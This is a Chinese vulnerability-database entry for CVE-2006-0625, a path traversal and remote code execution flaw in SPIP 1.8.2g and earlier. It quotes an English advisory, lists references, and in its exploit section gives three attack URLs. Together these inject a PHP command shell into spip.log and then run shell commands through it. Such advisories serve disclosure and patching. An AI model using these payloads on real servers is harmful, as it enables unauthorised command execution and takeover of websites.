SPIP Spip_RSS.PHP 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109713 漏洞类型 路径遍历
发布时间 2006-02-08 更新时间 2006-02-09
CVE编号 CVE-2006-0625 CNNVD-ID CNNVD-200602-123
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/27172
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-123
|漏洞详情
SPIP1.8.2g及之前版本的Spip_RSS.PHP中存在目录遍历漏洞。远程攻击者可以借助GLOBALS[type_urls](该参数中包含..)序列(随后可通过对指向spip_acces_doc.php3的file参数进行有效的直接静态代码注入来执行任意代码)读取或包含任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/16556/info

SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP commands on an affected computer with the privileges of the webserver process.

Successful exploitation could facilitate unauthorized access; other attacks are also possible.

Version 1.8.2g and earlier are vulnerable; other versions may also be affected.

http://www.example.com/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00

http://www.example.com/spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?>
http://www.example.com/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00
|参考资料

来源:BID
名称:16556
链接:http://www.securityfocus.com/bid/16556
来源:VUPEN
名称:ADV-2006-0483
链接:http://www.frsirt.com/english/advisories/2006/0483
来源:MISC
链接:http://retrogod.altervista.org/spip_182g_shell_inj_xpl.html
来源:XF
名称:spip-rss-file-include(24600)
链接:http://xforce.iss.net/xforce/xfdb/24600
来源:OSVDB
名称:23086
链接:http://www.osvdb.org/23086
来源:SECTRACK
名称:1015602
链接:http://securitytracker.com/id?1015602
来源:SECUNIA
名称:18676
链接:http://secunia.com/advisories/18676